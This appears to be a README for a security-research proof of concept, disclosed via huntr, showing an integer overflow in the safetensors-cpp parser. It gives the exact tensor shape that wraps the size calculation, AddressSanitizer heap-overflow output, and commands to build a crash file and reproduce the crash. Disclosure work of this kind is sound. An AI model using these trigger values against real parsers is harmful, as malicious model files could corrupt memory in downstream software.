File size: 819 Bytes
4c19aea | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | ---
tags:
- safetensors
- security-research
---
# SafeTensors C++ Integer Overflow PoC
**Security Research - Responsible Disclosure via huntr**
## Vulnerability
safetensors-cpp `get_shape_size()` multiplies shape dimensions without overflow checking.
The Rust reference implementation uses `checked_mul` and rejects overflow.
Shape `[4194305, 4194305, 211106198978564]` overflows uint64 to 4.
Parser allocates 16 bytes, consumer iterates 4194305+ elements -> heap overflow.
## ASan Result
```
AddressSanitizer: heap-buffer-overflow WRITE of size 4
0x6020000001a0 is located 0 bytes after 16-byte region
```
## Reproduction
```bash
python3 craft_overflow.py
g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash crash_overflow.cc
./crash overflow_tensor.safetensors
```
|